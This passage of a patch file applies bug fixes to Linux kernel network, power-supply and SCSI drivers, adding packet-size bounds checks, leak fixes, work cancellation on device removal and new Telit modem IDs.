++++ b/drivers/net/ethernet/xircom/xirc2ps_cs.c
+@@ -503,6 +503,11 @@ static void
+ xirc2ps_detach(struct pcmcia_device *link)
+ {
+     struct net_device *dev = link->priv;
++    struct local_info *local = netdev_priv(dev);
++
++    netif_carrier_off(dev);
++    netif_tx_disable(dev);
++    cancel_work_sync(&local->tx_timeout_task);
+ 
+     dev_dbg(&link->dev, "detach\n");
+ 
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index e1a569b99e4a6..0b0c6c0764fe9 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -1913,6 +1913,8 @@ static int ca8210_skb_tx(
+ 	 * packet
+ 	 */
+ 	mac_len = ieee802154_hdr_peek_addrs(skb, &header);
++	if (mac_len < 0)
++		return mac_len;
+ 
+ 	secspec.security_level = header.sec.level;
+ 	secspec.key_id_mode = header.sec.key_id_mode;
+diff --git a/drivers/net/mdio/acpi_mdio.c b/drivers/net/mdio/acpi_mdio.c
+index d77c987fda9cd..4630dde019749 100644
+--- a/drivers/net/mdio/acpi_mdio.c
++++ b/drivers/net/mdio/acpi_mdio.c
+@@ -18,16 +18,18 @@ MODULE_AUTHOR("Calvin Johnson <calvin.johnson@oss.nxp.com>");
+ MODULE_LICENSE("GPL");
+ 
+ /**
+- * acpi_mdiobus_register - Register mii_bus and create PHYs from the ACPI ASL.
++ * __acpi_mdiobus_register - Register mii_bus and create PHYs from the ACPI ASL.
+  * @mdio: pointer to mii_bus structure
+  * @fwnode: pointer to fwnode of MDIO bus. This fwnode is expected to represent
++ * @owner: module owning this @mdio object.
+  * an ACPI device object corresponding to the MDIO bus and its children are
+  * expected to correspond to the PHY devices on that bus.
+  *
+  * This function registers the mii_bus structure and registers a phy_device
+  * for each child node of @fwnode.
+  */
+-int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
++int __acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode,
++			    struct module *owner)
+ {
+ 	struct fwnode_handle *child;
+ 	u32 addr;
+@@ -35,7 +37,7 @@ int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+ 
+ 	/* Mask out all PHYs from auto probing. */
+ 	mdio->phy_mask = GENMASK(31, 0);
+-	ret = mdiobus_register(mdio);
++	ret = __mdiobus_register(mdio, owner);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -55,4 +57,4 @@ int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+ 	}
+ 	return 0;
+ }
+-EXPORT_SYMBOL(acpi_mdiobus_register);
++EXPORT_SYMBOL(__acpi_mdiobus_register);
+diff --git a/drivers/net/mdio/mdio-thunder.c b/drivers/net/mdio/mdio-thunder.c
+index 822d2cdd2f359..394b864aaa372 100644
+--- a/drivers/net/mdio/mdio-thunder.c
++++ b/drivers/net/mdio/mdio-thunder.c
+@@ -104,6 +104,7 @@ static int thunder_mdiobus_pci_probe(struct pci_dev *pdev,
+ 		if (i >= ARRAY_SIZE(nexus->buses))
+ 			break;
+ 	}
++	fwnode_handle_put(fwn);
+ 	return 0;
+ 
+ err_release_regions:
+diff --git a/drivers/net/mdio/of_mdio.c b/drivers/net/mdio/of_mdio.c
+index 510822d6d0d90..1e46e39f5f46a 100644
+--- a/drivers/net/mdio/of_mdio.c
++++ b/drivers/net/mdio/of_mdio.c
+@@ -139,21 +139,23 @@ bool of_mdiobus_child_is_phy(struct device_node *child)
+ EXPORT_SYMBOL(of_mdiobus_child_is_phy);
+ 
+ /**
+- * of_mdiobus_register - Register mii_bus and create PHYs from the device tree
++ * __of_mdiobus_register - Register mii_bus and create PHYs from the device tree
+  * @mdio: pointer to mii_bus structure
+  * @np: pointer to device_node of MDIO bus.
++ * @owner: module owning the @mdio object.
+  *
+  * This function registers the mii_bus structure and registers a phy_device
+  * for each child node of @np.
+  */
+-int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np)
++int __of_mdiobus_register(struct mii_bus *mdio, struct device_node *np,
++			  struct module *owner)
+ {
+ 	struct device_node *child;
+ 	bool scanphys = false;
+ 	int addr, rc;
+ 
+ 	if (!np)
+-		return mdiobus_register(mdio);
++		return __mdiobus_register(mdio, owner);
+ 
+ 	/* Do not continue if the node is disabled */
+ 	if (!of_device_is_available(np))
+@@ -172,7 +174,7 @@ int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np)
+ 	of_property_read_u32(np, "reset-post-delay-us", &mdio->reset_post_delay_us);
+ 
+ 	/* Register the MDIO bus */
+-	rc = mdiobus_register(mdio);
++	rc = __mdiobus_register(mdio, owner);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -236,7 +238,7 @@ unregister:
+ 	mdiobus_unregister(mdio);
+ 	return rc;
+ }
+-EXPORT_SYMBOL(of_mdiobus_register);
++EXPORT_SYMBOL(__of_mdiobus_register);
+ 
+ /**
+  * of_mdio_find_device - Given a device tree node, find the mdio_device
+diff --git a/drivers/net/phy/mdio_devres.c b/drivers/net/phy/mdio_devres.c
+index b560e99695dfd..69b829e6ab35b 100644
+--- a/drivers/net/phy/mdio_devres.c
++++ b/drivers/net/phy/mdio_devres.c
+@@ -98,13 +98,14 @@ EXPORT_SYMBOL(__devm_mdiobus_register);
+ 
+ #if IS_ENABLED(CONFIG_OF_MDIO)
+ /**
+- * devm_of_mdiobus_register - Resource managed variant of of_mdiobus_register()
++ * __devm_of_mdiobus_register - Resource managed variant of of_mdiobus_register()
+  * @dev:	Device to register mii_bus for
+  * @mdio:	MII bus structure to register
+  * @np:		Device node to parse
++ * @owner:	Owning module
+  */
+-int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+-			     struct device_node *np)
++int __devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
++			       struct device_node *np, struct module *owner)
+ {
+ 	struct mdiobus_devres *dr;
+ 	int ret;
+@@ -117,7 +118,7 @@ int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+ 	if (!dr)
+ 		return -ENOMEM;
+ 
+-	ret = of_mdiobus_register(mdio, np);
++	ret = __of_mdiobus_register(mdio, np, owner);
+ 	if (ret) {
+ 		devres_free(dr);
+ 		return ret;
+@@ -127,7 +128,7 @@ int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+ 	devres_add(dev, dr);
+ 	return 0;
+ }
+-EXPORT_SYMBOL(devm_of_mdiobus_register);
++EXPORT_SYMBOL(__devm_of_mdiobus_register);
+ #endif /* CONFIG_OF_MDIO */
+ 
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/net/phy/phy.c b/drivers/net/phy/phy.c
+index e741d8aebffe1..d1aea767ed09f 100644
+--- a/drivers/net/phy/phy.c
++++ b/drivers/net/phy/phy.c
+@@ -57,6 +57,18 @@ static const char *phy_state_to_str(enum phy_state st)
+ 	return NULL;
+ }
+ 
++static void phy_process_state_change(struct phy_device *phydev,
++				     enum phy_state old_state)
++{
++	if (old_state != phydev->state) {
++		phydev_dbg(phydev, "PHY state change %s -> %s\n",
++			   phy_state_to_str(old_state),
++			   phy_state_to_str(phydev->state));
++		if (phydev->drv && phydev->drv->link_change_notify)
++			phydev->drv->link_change_notify(phydev);
++	}
++}
++
+ static void phy_link_up(struct phy_device *phydev)
+ {
+ 	phydev->phy_link_change(phydev, true);
+@@ -1093,6 +1105,7 @@ EXPORT_SYMBOL(phy_free_interrupt);
+ void phy_stop(struct phy_device *phydev)
+ {
+ 	struct net_device *dev = phydev->attached_dev;
++	enum phy_state old_state;
+ 
+ 	if (!phy_is_started(phydev) && phydev->state != PHY_DOWN) {
+ 		WARN(1, "called from state %s\n",
+@@ -1101,6 +1114,7 @@ void phy_stop(struct phy_device *phydev)
+ 	}
+ 
+ 	mutex_lock(&phydev->lock);
++	old_state = phydev->state;
+ 
+ 	if (phydev->state == PHY_CABLETEST) {
+ 		phy_abort_cable_test(phydev);
+@@ -1111,6 +1125,7 @@ void phy_stop(struct phy_device *phydev)
+ 		sfp_upstream_stop(phydev->sfp_bus);
+ 
+ 	phydev->state = PHY_HALTED;
++	phy_process_state_change(phydev, old_state);
+ 
+ 	mutex_unlock(&phydev->lock);
+ 
+@@ -1228,13 +1243,7 @@ void phy_state_machine(struct work_struct *work)
+ 	if (err < 0)
+ 		phy_error(phydev);
+ 
+-	if (old_state != phydev->state) {
+-		phydev_dbg(phydev, "PHY state change %s -> %s\n",
+-			   phy_state_to_str(old_state),
+-			   phy_state_to_str(phydev->state));
+-		if (phydev->drv && phydev->drv->link_change_notify)
+-			phydev->drv->link_change_notify(phydev);
+-	}
++	phy_process_state_change(phydev, old_state);
+ 
+ 	/* Only re-schedule a PHY state machine change if we are polling the
+ 	 * PHY, if PHY_MAC_INTERRUPT is set, then we will be moving
+diff --git a/drivers/net/usb/asix_devices.c b/drivers/net/usb/asix_devices.c
+index 11f60d32be82e..6eacbf17f1c0c 100644
+--- a/drivers/net/usb/asix_devices.c
++++ b/drivers/net/usb/asix_devices.c
+@@ -666,8 +666,9 @@ static int asix_resume(struct usb_interface *intf)
+ static int ax88772_init_mdio(struct usbnet *dev)
+ {
+ 	struct asix_common_private *priv = dev->driver_priv;
++	int ret;
+ 
+-	priv->mdio = devm_mdiobus_alloc(&dev->udev->dev);
++	priv->mdio = mdiobus_alloc();
+ 	if (!priv->mdio)
+ 		return -ENOMEM;
+ 
+@@ -679,7 +680,20 @@ static int ax88772_init_mdio(struct usbnet *dev)
+ 	snprintf(priv->mdio->id, MII_BUS_ID_SIZE, "usb-%03d:%03d",
+ 		 dev->udev->bus->busnum, dev->udev->devnum);
+ 
+-	return devm_mdiobus_register(&dev->udev->dev, priv->mdio);
++	ret = mdiobus_register(priv->mdio);
++	if (ret) {
++		netdev_err(dev->net, "Could not register MDIO bus (err %d)\n", ret);
++		mdiobus_free(priv->mdio);
++		priv->mdio = NULL;
++	}
++
++	return ret;
++}
++
++static void ax88772_mdio_unregister(struct asix_common_private *priv)
++{
++	mdiobus_unregister(priv->mdio);
++	mdiobus_free(priv->mdio);
+ }
+ 
+ static int ax88772_init_phy(struct usbnet *dev)
+@@ -897,16 +911,23 @@ static int ax88772_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	ret = ax88772_init_mdio(dev);
+ 	if (ret)
+-		return ret;
++		goto mdio_err;
+ 
+ 	ret = ax88772_phylink_setup(dev);
+ 	if (ret)
+-		return ret;
++		goto phylink_err;
+ 
+ 	ret = ax88772_init_phy(dev);
+ 	if (ret)
+-		phylink_destroy(priv->phylink);
++		goto initphy_err;
+ 
++	return 0;
++
++initphy_err:
++	phylink_destroy(priv->phylink);
++phylink_err:
++	ax88772_mdio_unregister(priv);
++mdio_err:
+ 	return ret;
+ }
+ 
+@@ -927,6 +948,7 @@ static void ax88772_unbind(struct usbnet *dev, struct usb_interface *intf)
+ 	phylink_disconnect_phy(priv->phylink);
+ 	rtnl_unlock();
+ 	phylink_destroy(priv->phylink);
++	ax88772_mdio_unregister(priv);
+ 	asix_rx_fixup_common_free(dev->driver_priv);
+ }
+ 
+diff --git a/drivers/net/usb/cdc_mbim.c b/drivers/net/usb/cdc_mbim.c
+index c89639381eca3..cd4083e0b3b9e 100644
+--- a/drivers/net/usb/cdc_mbim.c
++++ b/drivers/net/usb/cdc_mbim.c
+@@ -665,6 +665,11 @@ static const struct usb_device_id mbim_devs[] = {
+ 	  .driver_info = (unsigned long)&cdc_mbim_info_avoid_altsetting_toggle,
+ 	},
+ 
++	/* Telit FE990 */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x1bc7, 0x1081, USB_CLASS_COMM, USB_CDC_SUBCLASS_MBIM, USB_CDC_PROTO_NONE),
++	  .driver_info = (unsigned long)&cdc_mbim_info_avoid_altsetting_toggle,
++	},
++
+ 	/* default entry */
+ 	{ USB_INTERFACE_INFO(USB_CLASS_COMM, USB_CDC_SUBCLASS_MBIM, USB_CDC_PROTO_NONE),
+ 	  .driver_info = (unsigned long)&cdc_mbim_info_zlp,
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index 068488890d57b..c458c030fadf6 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -3579,13 +3579,29 @@ static int lan78xx_rx(struct lan78xx_net *dev, struct sk_buff *skb,
+ 		size = (rx_cmd_a & RX_CMD_A_LEN_MASK_);
+ 		align_count = (4 - ((size + RXW_PADDING) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err rx_cmd_a=0x%08x\n",
++				  rx_cmd_a);
++			return 0;
++		}
++
+ 		if (unlikely(rx_cmd_a & RX_CMD_A_RED_)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error rx_cmd_a=0x%08x", rx_cmd_a);
+ 		} else {
+-			u32 frame_len = size - ETH_FCS_LEN;
++			u32 frame_len;
+ 			struct sk_buff *skb2;
+ 
++			if (unlikely(size < ETH_FCS_LEN)) {
++				netif_dbg(dev, rx_err, dev->net,
++					  "size err rx_cmd_a=0x%08x\n",
++					  rx_cmd_a);
++				return 0;
++			}
++
++			frame_len = size - ETH_FCS_LEN;
++
+ 			skb2 = napi_alloc_skb(&dev->napi, frame_len);
+ 			if (!skb2)
+ 				return 0;
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 554d4e2a84a4e..2cc28af52ee25 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1363,6 +1363,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1057, 2)},	/* Telit FN980 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1060, 2)},	/* Telit LN920 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1070, 2)},	/* Telit FN990 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1080, 2)}, /* Telit FE990 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1100, 3)},	/* Telit ME910 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1101, 3)},	/* Telit ME910 dual modem */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1200, 5)},	/* Telit LE920 */
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 32d2c60d334dc..563ecd27b93ea 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -1833,6 +1833,12 @@ static int smsc95xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		size = (u16)((header & RX_STS_FL_) >> 16);
+ 		align_count = (4 - ((size + NET_IP_ALIGN) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err header=0x%08x\n", header);
++			return 0;
++		}
++
+ 		if (unlikely(header & RX_STS_ES_)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error header=0x%08x\n", header);
+diff --git a/drivers/platform/chrome/cros_ec_chardev.c b/drivers/platform/chrome/cros_ec_chardev.c
+index 0de7c255254e0..d6de5a2941282 100644
+--- a/drivers/platform/chrome/cros_ec_chardev.c
++++ b/drivers/platform/chrome/cros_ec_chardev.c
+@@ -284,7 +284,7 @@ static long cros_ec_chardev_ioctl_xcmd(struct cros_ec_dev *ec, void __user *arg)
+ 	    u_cmd.insize > EC_MAX_MSG_BYTES)
+ 		return -EINVAL;
+ 
+-	s_cmd = kmalloc(sizeof(*s_cmd) + max(u_cmd.outsize, u_cmd.insize),
++	s_cmd = kzalloc(sizeof(*s_cmd) + max(u_cmd.outsize, u_cmd.insize),
+ 			GFP_KERNEL);
+ 	if (!s_cmd)
+ 		return -ENOMEM;
+diff --git a/drivers/platform/x86/intel/int3472/tps68470_board_data.c b/drivers/platform/x86/intel/int3472/tps68470_board_data.c
+index 309eab9c05588..322237e056f32 100644
+--- a/drivers/platform/x86/intel/int3472/tps68470_board_data.c
++++ b/drivers/platform/x86/intel/int3472/tps68470_board_data.c
+@@ -159,9 +159,10 @@ static const struct int3472_tps68470_board_data surface_go_tps68470_board_data =
+ static const struct int3472_tps68470_board_data surface_go3_tps68470_board_data = {
+ 	.dev_name = "i2c-INT3472:01",
+ 	.tps68470_regulator_pdata = &surface_go_tps68470_pdata,
+-	.n_gpiod_lookups = 1,
++	.n_gpiod_lookups = 2,
+ 	.tps68470_gpio_lookup_tables = {
+-		&surface_go_int347a_gpios
++		&surface_go_int347a_gpios,
++		&surface_go_int347e_gpios,
+ 	},
+ };
+ 
+diff --git a/drivers/power/supply/bq24190_charger.c b/drivers/power/supply/bq24190_charger.c
+index 2274679c5ddd2..d7400b56820d6 100644
+--- a/drivers/power/supply/bq24190_charger.c
++++ b/drivers/power/supply/bq24190_charger.c
+@@ -1906,6 +1906,7 @@ static void bq24190_remove(struct i2c_client *client)
+ 	struct bq24190_dev_info *bdi = i2c_get_clientdata(client);
+ 	int error;
+ 
++	cancel_delayed_work_sync(&bdi->input_current_limit_work);
+ 	error = pm_runtime_resume_and_get(bdi->dev);
+ 	if (error < 0)
+ 		dev_warn(bdi->dev, "pm_runtime_get failed: %i\n", error);
+diff --git a/drivers/power/supply/da9150-charger.c b/drivers/power/supply/da9150-charger.c
+index f9314cc0cd75f..6b987da586556 100644
+--- a/drivers/power/supply/da9150-charger.c
++++ b/drivers/power/supply/da9150-charger.c
+@@ -662,6 +662,7 @@ static int da9150_charger_remove(struct platform_device *pdev)
+ 
+ 	if (!IS_ERR_OR_NULL(charger->usb_phy))
+ 		usb_unregister_notifier(charger->usb_phy, &charger->otg_nb);
++	cancel_work_sync(&charger->otg_work);
+ 
+ 	power_supply_unregister(charger->battery);
+ 	power_supply_unregister(charger->usb);
+diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c
+index 610a51538f034..0781f991e7845 100644
+--- a/drivers/scsi/device_handler/scsi_dh_alua.c
++++ b/drivers/scsi/device_handler/scsi_dh_alua.c
+@@ -1117,10 +1117,12 @@ static int alua_activate(struct scsi_device *sdev,
+ 	rcu_read_unlock();
+ 	mutex_unlock(&h->init_mutex);
+ 
+-	if (alua_rtpg_queue(pg, sdev, qdata, true))
++	if (alua_rtpg_queue(pg, sdev, qdata, true)) {
+ 		fn = NULL;
+-	else
++	} else {
++		kfree(qdata);
+ 		err = SCSI_DH_DEV_OFFLINED;
++	}
+ 	kref_put(&pg->kref, release_port_group);
+ out:
+ 	if (fn)
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index d56b4bfd27678..620dcefe7b6f4 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -2448,8 +2448,7 @@ static int interrupt_preinit_v3_hw(struct hisi_hba *hisi_hba)
+ 	hisi_hba->cq_nvecs = vectors - BASE_VECTORS_V3_HW;
+ 	shost->nr_hw_queues = hisi_hba->cq_nvecs;
+ 
+-	devm_add_action(&pdev->dev, hisi_sas_v3_free_vectors, pdev);
+-	return 0;
++	return devm_add_action(&pdev->dev, hisi_sas_v3_free_vectors, pdev);
+ }
+ 
+ static int interrupt_init_v3_hw(struct hisi_hba *hisi_hba)
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index b535f1fd30100..2f38c8d5a48a9 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -7234,6 +7234,8 @@ lpfc_sli4_cgn_params_read(struct lpfc_hba *phba)
+ 	/* Find out if the FW has a new set of congestion parameters. */
+ 	len = sizeof(struct lpfc_cgn_param);
+ 	pdata = kzalloc(len, GFP_KERNEL);
++	if (!pdata)
++		return -ENOMEM;
+ 	ret = lpfc_read_object(phba, (char *)LPFC_PORT_CFG_NAME,
+ 			       pdata, len);
+ 
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index b93c948c4fcc4..b44bb3ae22ad9 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -21886,20 +21886,20 @@ lpfc_get_io_buf_from_private_pool(struct lpfc_hba *phba,
+ static struct lpfc_io_buf *
+ lpfc_get_io_buf_from_expedite_pool(struct lpfc_hba *phba)
+ {
+-	struct lpfc_io_buf *lpfc_ncmd;
++	struct lpfc_io_buf *lpfc_ncmd = NULL, *iter;
+ 	struct lpfc_io_buf *lpfc_ncmd_next;
+ 	unsigned long iflag;
+ 	struct lpfc_epd_pool *epd_pool;
+ 
+ 	epd_pool = &phba->epd_pool;
+-	lpfc_ncmd = NULL;
+ 
+ 	spin_lock_irqsave(&epd_pool->lock, iflag);
+ 	if (epd_pool->count > 0) {
+-		list_for_each_entry_safe(lpfc_ncmd, lpfc_ncmd_next,
++		list_for_each_entry_safe(iter, lpfc_ncmd_next,
+ 					 &epd_pool->list, list) {
+-			list_del(&lpfc_ncmd->list);
++			list_del(&iter->list);
+ 			epd_pool->count--;
++			lpfc_ncmd = iter;
+ 			break;
+ 		}
+ 	}
+@@ -22096,10 +22096,6 @@ lpfc_read_object(struct lpfc_hba *phba, char *rdobject, uint32_t *datap,
+ 	struct lpfc_dmabuf *pcmd;
+ 	u32 rd_object_name[LPFC_MBX_OBJECT_NAME_LEN_DW] = {0};
+ 
+-	/* sanity check on queue memory */
+-	if (!datap)
+-		return -ENODEV;
+-
+ 	mbox = mempool_alloc(phba->mbox_mem_pool, GFP_KERNEL);
+ 	if (!mbox)
+ 		return -ENOMEM;
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index bff6377023979..d10c6afb7f9cd 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -886,7 +886,7 @@ static int mpi3mr_build_nvme_prp(struct mpi3mr_ioc *mrioc,
+ 			 * each time through the loop.
+ 			 */
+ 			*prp_entry = cpu_to_le64(dma_addr);
+-			if (*prp1_entry & sgemod_mask) {
++			if (*prp_entry & sgemod_mask) {
+ 				dprint_bsg_err(mrioc,
+ 				    "%s: PRP address collides with SGE modifier\n",
+ 				    __func__);
+@@ -895,7 +895,7 @@ static int mpi3mr_build_nvme_prp(struct mpi3mr_ioc *mrioc,
+ 			*prp_entry &= ~sgemod_mask;
+ 			*prp_entry |= sgemod_val;
+ 			prp_entry++;
+-			prp_entry_dma++;
++			prp_entry_dma += prp_size;
+ 		}
+ 
+ 		/*
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 74fa7f90399e3..ea9e69fb62826 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1198,7 +1198,7 @@ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+  */
+ static int mpi3mr_bring_ioc_ready(struct mpi3mr_ioc *mrioc)
+ {
+-	u32 ioc_config, ioc_status, timeout;
++	u32 ioc_config, ioc_status, timeout, host_diagnostic;
+ 	int retval = 0;
+ 	enum mpi3mr_iocstate ioc_state;
+ 	u64 base_info;
+@@ -1252,6 +1252,23 @@ static int mpi3mr_bring_ioc_ready(struct mpi3mr_ioc *mrioc)
+ 			    retval, mpi3mr_iocstate_name(ioc_state));
+ 	}
+ 	if (ioc_state != MRIOC_STATE_RESET) {
++		if (ioc_state == MRIOC_STATE_FAULT) {
++			timeout = MPI3_SYSIF_DIAG_SAVE_TIMEOUT * 10;
++			mpi3mr_print_fault_info(mrioc);
++			do {
++				host_diagnostic =
++					readl(&mrioc->sysif_regs->host_diagnostic);
++				if (!(host_diagnostic &
++				      MPI3_SYSIF_HOST_DIAG_SAVE_IN_PROGRESS))
++					break;
++				if (!pci_device_is_present(mrioc->pdev)) {
++					mrioc->unrecoverable = 1;
++					ioc_err(mrioc, "controller is not present at the bringup\n");
++					goto out_device_not_present;
++				}
++				msleep(100);
++			} while (--timeout);
++		}
+ 		mpi3mr_print_fault_info(mrioc);
+ 		ioc_info(mrioc, "issuing soft reset to bring to reset state\n");
+ 		retval = mpi3mr_issue_reset(mrioc,
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 50263ba4f8428..5748bd9369ff7 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1549,7 +1549,8 @@ static void mpi3mr_sas_port_remove(struct mpi3mr_ioc *mrioc, u64 sas_address,
+ 
+ 	list_for_each_entry_safe(mr_sas_phy, next_phy,
+ 	    &mr_sas_port->phy_list, port_siblings) {
+-		if ((mrioc->logging_level & MPI3_DEBUG_TRANSPORT_INFO))
++		if ((!mrioc->stop_drv_processing) &&
++		    (mrioc->logging_level & MPI3_DEBUG_TRANSPORT_INFO))
+ 			dev_info(&mr_sas_port->port->dev,
+ 			    "remove: sas_address(0x%016llx), phy(%d)\n",
+ 			    (unsigned long long)
+@@ -2354,15 +2355,16 @@ int mpi3mr_report_tgtdev_to_sas_transport(struct mpi3mr_ioc *mrioc,
+ 	tgtdev->host_exposed = 1;
+ 	if (!mpi3mr_sas_port_add(mrioc, tgtdev->dev_handle,
+ 	    sas_address_parent, hba_port)) {
+-		tgtdev->host_exposed = 0;
+ 		retval = -1;
+-	} else if ((!tgtdev->starget)) {
+-		if (!mrioc->is_driver_loading)
++		} else if ((!tgtdev->starget) && (!mrioc->is_driver_loading)) {
+ 			mpi3mr_sas_port_remove(mrioc, sas_address,
+ 			    sas_address_parent, hba_port);
+-		tgtdev->host_exposed = 0;
+ 		retval = -1;
+ 	}
++	if (retval) {
++		tgtdev->dev_spec.sas_sata_inf.hba_port = NULL;
++		tgtdev->host_exposed = 0;
++	}
+ 	return retval;
+ }
+ 
+@@ -2391,6 +2393,7 @@ void mpi3mr_remove_tgtdev_from_sas_transport(struct mpi3mr_ioc *mrioc,
+ 	mpi3mr_sas_port_remove(mrioc, sas_address, sas_address_parent,
+ 	    hba_port);
+ 	tgtdev->host_exposed = 0;
++	tgtdev->dev_spec.sas_sata_inf.hba_port = NULL;
+ }
+ 
+ /**
+@@ -2447,7 +2450,7 @@ static u8 mpi3mr_get_port_id_by_rphy(struct mpi3mr_ioc *mrioc, struct sas_rphy *
+ 
+ 		tgtdev = __mpi3mr_get_tgtdev_by_addr_and_rphy(mrioc,
+ 			    rphy->identify.sas_address, rphy);
+-		if (tgtdev) {
++		if (tgtdev && tgtdev->dev_spec.sas_sata_inf.hba_port) {
+ 			port_id =
+ 				tgtdev->dev_spec.sas_sata_inf.hba_port->port_id;
+ 			mpi3mr_tgtdev_put(tgtdev);
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index e3256e721be14..ee54207fc5319 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -192,6 +192,7 @@ extern int ql2xsecenable;
+ extern int ql2xenforce_iocb_limit;
+ extern int ql2xabts_wait_nvme;
+ extern u32 ql2xnvme_queues;
++extern int ql2xfc2target;
+ 
+ extern int qla2x00_loop_reset(scsi_qla_host_t *);
+ extern void qla2x00_abort_all_cmds(scsi_qla_host_t *, int);
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index a8d822c4e3bac..93f7f3dd5d82b 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1841,7 +1841,8 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 	case RSCN_PORT_ADDR:
+ 		fcport = qla2x00_find_fcport_by_nportid(vha, &ea->id, 1);
+ 		if (fcport) {
+-			if (fcport->flags & FCF_FCP2_DEVICE &&
++			if (ql2xfc2target &&
++			    fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE) {
+ 				ql_dbg(ql_dbg_disc, vha, 0x2115,
+ 				       "Delaying session delete for FCP2 portid=%06x %8phC ",
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index cbbd7014da939..86928a762a7a6 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -1900,6 +1900,8 @@ qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
+ 	}
+ 
+ 	req->outstanding_cmds[index] = NULL;
++
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	return sp;
+ }
+ 
+@@ -3112,7 +3114,6 @@ qla25xx_process_bidir_status_iocb(scsi_qla_host_t *vha, void *pkt,
+ 	}
+ 	bsg_reply->reply_payload_rcv_len = 0;
+ 
+-	qla_put_fw_resources(sp->qpair, &sp->iores);
+ done:
+ 	/* Return the vendor specific reply to API */
+ 	bsg_reply->reply_data.vendor_reply.vendor_rsp[0] = rval;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
